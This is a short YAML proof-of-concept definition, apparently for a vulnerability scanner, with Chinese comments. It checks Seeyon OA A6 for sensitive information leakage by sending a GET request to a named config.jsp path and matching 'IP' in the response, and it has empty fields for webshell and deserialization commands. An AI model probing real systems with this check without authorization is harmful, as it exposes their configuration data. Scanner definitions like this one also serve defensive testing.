#poc名称
- name:
  - name: "SeeyouOA_A6_config_jsp_Sensitive_Information_Leakage"


#请求方式
- method:
  - method: "get"

#payload
- payload:
  - payload: "isNone"

#response包里的关键字
- word:
  - word:
      - "IP"

#漏洞的位置
- url:
  - url : "/yyoa/ext/trafaxserver/SystemManage/config.jsp"

#验证是否攻击成功的 请求方式
- method-V:
  - method: "isNone"

#webshell位置
- verify:
  - verify : "isNone"

#cmd 为了适配Java反序列化漏洞
- cmd:
  - cmd : "isNone"